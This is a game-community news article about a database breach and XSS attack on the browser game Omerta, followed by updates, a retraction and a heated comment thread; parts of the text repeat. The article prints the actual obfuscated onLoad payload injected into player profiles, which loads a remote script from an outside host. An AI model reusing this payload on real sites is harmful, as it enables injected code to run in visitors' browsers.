» Menu
» OB/Site News
» Articles
» Barafranca News
|
article
Last weekend Omerta had some downtime. Admins posted some news that there was something wrong with the server. Some hardware problem as Brando states.
Barafranca News: Connection problems - fixed
In reality, hackers had access to the database of Omerta. Due the lack of proper coding on the hitlist page, hackers were able to do a "query" and got into the database of Omerta.
Result? All information you could wish for "could" have been downloaded. This contains: successors, bullet amount, passwords(md5 hashed), emails, testaments.. everything!
After the news post of Brando, the hackers got kind of "pissed/annoyed" that the Admins were trying to cover up what was happening and decided to go public with the information.
They wrote a small tool which would change all profiles ingame. About the same thing what happened versions ago (Stidda <-> Barafranca)
They reached about ~800 profiles before it got noted, and admins disabled images on profiles again.
Barafranca News: Removed Img(s)
This script loaded an unknown JavaScript file onto the profiles, which may could have been used to cause harm, once the affected profile was loaded. Unfortunately, we don't have the particular JavaScript file, and thus cannot analyse the rest of the intentions of the hackers.
Update:
We now heard the hackers wanted to wait until 2-3k profiles were infected, and then show the database setup all at once on those profiles.
Update:
Just as more proofs, the hackers has released a list of 515 users with their set testament.
Also they released the Global Vars of the server of Barafranca.
Update 28/09:
After six days of silence in the Admins' latest news section and ignoring our invitation to comment on this article with the story from the admins' point of view, the crew of this site has been glined for an undefined amount of time with the message to "contact Brando". Also ingames of our crew have been frozen and at least two have been akilled. Links to our sites are blocked on IRC for now.
Later on the day, a statement has been released on Omerta in which Bramblerose states that last Thursday testament info indeed was obtained through a XSS exploit. Today they have taken measures to protect the players of which this data has been obtained.
They have yet to comment on our accusation that their downtime was linked to the hack we described here, nor have they said anything about the database setup leak, global server variables leak or the profiles infected by JavaScript code.
Update:
One of the hackers has spread a link through our comments, which shows a list of family names and then two lists of user id's who were the successors of the corresponding families at the time of the hack, which is just another proof that the database was accessible completely.
Update 30/09:
We're sorry for connecting the downtime with the hacks, we had no proof for this besides coincidence and a statement from the hackers. We apologise to the Omerta crew for this false information and for saying they were trying to cover the hack up by saying they had hardware problems and thus we retract this accusation.
We also apologise for helping the hackers spread the lists containing testament information and successor information further by linking to them in our article and we sincerely hope that none of the players or families on those lists had any negative consequences thanks to those lists being linked to in our article. We apologise for any of the negative consequences which may have occurred. We're also sorry to the Omerta crew if linking to the lists in our article caused the Omerta crew to have extra worries or had to spend more time on damage control.
Barafranca News: Connection problems - fixed
By Brando: There was a hardware problem which was solved by switching that machine off.
We're disappointed that the Sysadmin team were not able to find this out earlier and there will be an enquiry.
Sorry for the inconvenience and thanks to Teckna, Paul and Andre, who remained awake fixing this - trying everything in the software - until they finally found that it was an unpredictable physical problem.
Most of your criticisms are accurate and I will conduct an enquiry as to why we did not publicly react sooner.
We're disappointed that the Sysadmin team were not able to find this out earlier and there will be an enquiry.
Sorry for the inconvenience and thanks to Teckna, Paul and Andre, who remained awake fixing this - trying everything in the software - until they finally found that it was an unpredictable physical problem.
Most of your criticisms are accurate and I will conduct an enquiry as to why we did not publicly react sooner.
In reality, hackers had access to the database of Omerta. Due the lack of proper coding on the hitlist page, hackers were able to do a "query" and got into the database of Omerta.
Result? All information you could wish for "could" have been downloaded. This contains: successors, bullet amount, passwords(md5 hashed), emails, testaments.. everything!
After the news post of Brando, the hackers got kind of "pissed/annoyed" that the Admins were trying to cover up what was happening and decided to go public with the information.
They wrote a small tool which would change all profiles ingame. About the same thing what happened versions ago (Stidda <-> Barafranca)
They reached about ~800 profiles before it got noted, and admins disabled images on profiles again.
Barafranca News: Removed Img(s)
onLoad=m=document.createElement(String.fromCharCode( 115,99,114,105,112,116));m.src=String.fromCharCode( 104,116,116,112,58,47, 47,97,46,105,116,115,114,46,114, 117,47,107,110,97,115,50,46,106,115);document.getElementsByTagName( String.fromCharCode(104,101,97,100))[0].appendChild(m)
Translation:
Once page has been loaded, create JavaScript placeholder. Then load and place http://a.itsr.ru/knas2.js in it.
Once page has been loaded, create JavaScript placeholder. Then load and place http://a.itsr.ru/knas2.js in it.
This script loaded an unknown JavaScript file onto the profiles, which may could have been used to cause harm, once the affected profile was loaded. Unfortunately, we don't have the particular JavaScript file, and thus cannot analyse the rest of the intentions of the hackers.
Update:
We now heard the hackers wanted to wait until 2-3k profiles were infected, and then show the database setup all at once on those profiles.
Update:
Just as more proofs, the hackers has released a list of 515 users with their set testament.
Also they released the Global Vars of the server of Barafranca.
Update 28/09:
After six days of silence in the Admins' latest news section and ignoring our invitation to comment on this article with the story from the admins' point of view, the crew of this site has been glined for an undefined amount of time with the message to "contact Brando". Also ingames of our crew have been frozen and at least two have been akilled. Links to our sites are blocked on IRC for now.
Later on the day, a statement has been released on Omerta in which Bramblerose states that last Thursday testament info indeed was obtained through a XSS exploit. Today they have taken measures to protect the players of which this data has been obtained.
They have yet to comment on our accusation that their downtime was linked to the hack we described here, nor have they said anything about the database setup leak, global server variables leak or the profiles infected by JavaScript code.
Update:
One of the hackers has spread a link through our comments, which shows a list of family names and then two lists of user id's who were the successors of the corresponding families at the time of the hack, which is just another proof that the database was accessible completely.
Update 30/09:
We're sorry for connecting the downtime with the hacks, we had no proof for this besides coincidence and a statement from the hackers. We apologise to the Omerta crew for this false information and for saying they were trying to cover the hack up by saying they had hardware problems and thus we retract this accusation.
We also apologise for helping the hackers spread the lists containing testament information and successor information further by linking to them in our article and we sincerely hope that none of the players or families on those lists had any negative consequences thanks to those lists being linked to in our article. We apologise for any of the negative consequences which may have occurred. We're also sorry to the Omerta crew if linking to the lists in our article caused the Omerta crew to have extra worries or had to spend more time on damage control.
Rix (15:34:06 - 28-09)
Anonymous at 15:28:27 on 28/09:
Btw its posted over 500 on that list, not 100, counted it roughly.
Btw its posted over 500 on that list, not 100, counted it roughly.
Anonymous (15:28:27 - 28-09)
Anonymous at 14:36:19 on 28/09:
The xss exploit where the hackers could see who you had set as testament had nothing to do with the hitlist exploit or the broken firewall server.
The xss exploit where the hackers could see who you had set as testament had nothing to do with the hitlist exploit or the broken firewall server.
And the explanation for how the database structure was downloaded ? and the GLOBAL_VARIABLES table was posted here ?
Btw, very nice of admins of setting up and 48 hours protection one week after they told us to remove the injected code from the profiles. People have known about this for an week now, what about that ?. ( Btw its posted over 500 on that list, not 100, counted it roughly. )
For admins: Why ban the reporters after they obivously posted some sence of truth, which is the main object for an real reporter. Just fucking wrong, go do smth useful instead
Entity (15:28:02 - 28-09)
Rix at 15:17:41 on 28/09:
We don't know, they were anonymous and, logically, wish to stay that way.
Entity at 15:02:13 on 28/09:
But who are behind this hoax anyway?
But who are behind this hoax anyway?
Logically it's ind.
Arrogant crew they are, imo they should be thankful for such info.
And they can fix it before they see a public proof.
Rix (15:17:41 - 28-09)
Entity at 15:02:13 on 28/09:
But who are behind this hoax anyway?
But who are behind this hoax anyway?
Rix (15:10:22 - 28-09)
Anonymous at 15:00:14 on 28/09:
so first the crew denies that there is anything wrong, so they call ob devs liars, then they say, yes there was a security hole, but still they ar liars !
right ...
so first the crew denies that there is anything wrong, so they call ob devs liars, then they say, yes there was a security hole, but still they ar liars !
right ...
Entity (15:02:13 - 28-09)
Lol first you warned them, and they didn't listen..
The proof is there, and now you are the bad guy Rix..
I bet they blame you for it to lol.
But who are behind this hoax anyway?
The proof is there, and now you are the bad guy Rix..
I bet they blame you for it to lol.
But who are behind this hoax anyway?
Anonymous (15:00:14 - 28-09)
so first the crew denies that there is anything wrong, so they call ob devs liars, then they say, yes there was a security hole, but still they ar liars !
right ...
right ...
Anonymous (15:00:04 - 28-09)
So while they "review" the relationship with omerta beyond they already a-killed them while admitting that there was an exploit after all...
And then people often condemn anonymous comments. I don't want my account banned just because I say a few words against omerta crew as my point of view.
Big picture:
1. Omerta beyond makes a news post stating there was an exploit
2. Brando denies enters in confrontation with beyond crew stating poor journalism
3. They close the channel and accounts of all the omerta beyond crew
4. They launch an official statement telling there was an exploit after
Can anyone tell me another game like this so I can start playing? I really enjoy mafia games but not NAZI Mafia games like this.
And then people often condemn anonymous comments. I don't want my account banned just because I say a few words against omerta crew as my point of view.
Big picture:
1. Omerta beyond makes a news post stating there was an exploit
2. Brando denies enters in confrontation with beyond crew stating poor journalism
3. They close the channel and accounts of all the omerta beyond crew
4. They launch an official statement telling there was an exploit after
Can anyone tell me another game like this so I can start playing? I really enjoy mafia games but not NAZI Mafia games like this.
Anonymous (14:46:14 - 28-09)
Although we regret this a lot we can assure you that there is no need to change your email or passwords cause no one got access to our database.'
Then WTF are these Global var things+ the complete database lay-out that was posted on this site..before being removed a couple of hours ago by sbanks I believe?
Then WTF are these Global var things+ the complete database lay-out that was posted on this site..before being removed a couple of hours ago by sbanks I believe?
Anonymous (14:36:19 - 28-09)
Dear all,
There was a security hole last Thursday which we managed to close within 30 minutes. The xss exploit where the hackers could see who you had set as testament had nothing to do with the hitlist exploit or the broken firewall server.
We were pretty shocked to see how the Omerta Beyond ‘news’ site pasted inaccurate information on their site as being the truth. It’s clearly a sign of bad journalism and Brando contacted them straight away to ask for some clarification.
At the moment we’re reviewing the relationship between Omerta Beyond and the game and we have frozen the accounts of the ones involved with the Omerta Beyond ‘news’ site. If any of them want to be thawed they should contact Brando.
We are aware of the list with ingames/ testaments that’s on that same ‘new’s site. Although we regret this a lot we can assure you that there is no need to change your email or passwords cause no one got access to our database. The hackers got partial access to the accounts only.
Too make sure that the players on this list (and their testaments) won’t get killed hoping for an easy way of getting money we put those accounts in protection mode, which means no one can hire detectives to find them. Too make it even they can’t hire detectives themselves either. This will be automatically removed after 48 hours.
We will keep you posted.
Bramblerose
So now they are just admitting that suddenly a glitch appeared that only showed testamant?
Really?
Jesus christ :')
There was a security hole last Thursday which we managed to close within 30 minutes. The xss exploit where the hackers could see who you had set as testament had nothing to do with the hitlist exploit or the broken firewall server.
We were pretty shocked to see how the Omerta Beyond ‘news’ site pasted inaccurate information on their site as being the truth. It’s clearly a sign of bad journalism and Brando contacted them straight away to ask for some clarification.
At the moment we’re reviewing the relationship between Omerta Beyond and the game and we have frozen the accounts of the ones involved with the Omerta Beyond ‘news’ site. If any of them want to be thawed they should contact Brando.
We are aware of the list with ingames/ testaments that’s on that same ‘new’s site. Although we regret this a lot we can assure you that there is no need to change your email or passwords cause no one got access to our database. The hackers got partial access to the accounts only.
Too make sure that the players on this list (and their testaments) won’t get killed hoping for an easy way of getting money we put those accounts in protection mode, which means no one can hire detectives to find them. Too make it even they can’t hire detectives themselves either. This will be automatically removed after 48 hours.
We will keep you posted.
Bramblerose
So now they are just admitting that suddenly a glitch appeared that only showed testamant?
Really?
Jesus christ :')
Anonymous (14:35:57 - 28-09)
LOL Rix. You have been killed by a very, very poor lil kiddo! :')
Time to quit this game people.
Time to quit this game people.
Rix (14:22:00 - 28-09)
Myself:
Kyra:
Srsly admins what the fuck do you want? -_-'
I fucking emailed you 6 hours ago, why don't you just read your inbox instead of akilling us and telling us to mail you?
They killed you, the bastards!
Go To Account Page
Your account was frozen
Your account (Lanzin) was frozen by Bramblerose. Please contact Bramblerose via email: [email protected] or IRC (http://www.mibbit.com/) on irc.barafranca.com.
Go To Account Page
Your account was frozen
Your account (Lanzin) was frozen by Bramblerose. Please contact Bramblerose via email: [email protected] or IRC (http://www.mibbit.com/) on irc.barafranca.com.
Kyra:
They killed you, the bastards!
Go To Account Page
Your account (Entropy) was frozen by Bramblerose. Please contact Bramblerose via email: [email protected] or IRC (http://www.mibbit.com/) on irc.barafranca.com.
Go To Account Page
Your account (Entropy) was frozen by Bramblerose. Please contact Bramblerose via email: [email protected] or IRC (http://www.mibbit.com/) on irc.barafranca.com.
Srsly admins what the fuck do you want? -_-'
I fucking emailed you 6 hours ago, why don't you just read your inbox instead of akilling us and telling us to mail you?
Anonymous (13:59:20 - 28-09)
Actually Hugobust, you still havent answered my question
how did my personal testament information get on that list that was posted?
Beth ingame
Acidqueen irc
Rix - i was waiting to pounce on you on irc to reset my password, but guess thats pretty impossible atm :x
how did my personal testament information get on that list that was posted?
Beth ingame
Acidqueen irc
Rix - i was waiting to pounce on you on irc to reset my password, but guess thats pretty impossible atm :x
Anonymous (13:04:25 - 28-09)
Hugobust at 12:01:41 on 28/09:
I'm lauging my ass off about all the comments i got on my reaction.
You really proved my point.
Keep up the news rix :)
Got nothing more to say.
I'm lauging my ass off about all the comments i got on my reaction.
You really proved my point.
Keep up the news rix :)
Got nothing more to say.
And this proves our point that you and the other devs/admins are incompetent! :)
Taking players feedback and comments seriously and with some respect.... LOL. Missed some parts in your upbringing? :P
Rix (12:31:03 - 28-09)
Hugobust at 12:01:41 on 28/09:
Keep up the news rix :)
Keep up the news rix :)
Please tell Brando to respond on my emails I have send him 4 hours ago.
Anonymous (12:08:20 - 28-09)
You didnt have a point, you dont even have an opinion.
You just stated some random comments that had little to do with the subject.
Yet you are to stupid to realise that.
You just stated some random comments that had little to do with the subject.
Yet you are to stupid to realise that.
Hugobust (12:01:41 - 28-09)
I'm lauging my ass off about all the comments i got on my reaction.
You really proved my point.
Keep up the news rix :)
Got nothing more to say.
You really proved my point.
Keep up the news rix :)
Got nothing more to say.
Good on the beyond news crew! You backed up your position with facts.
Respect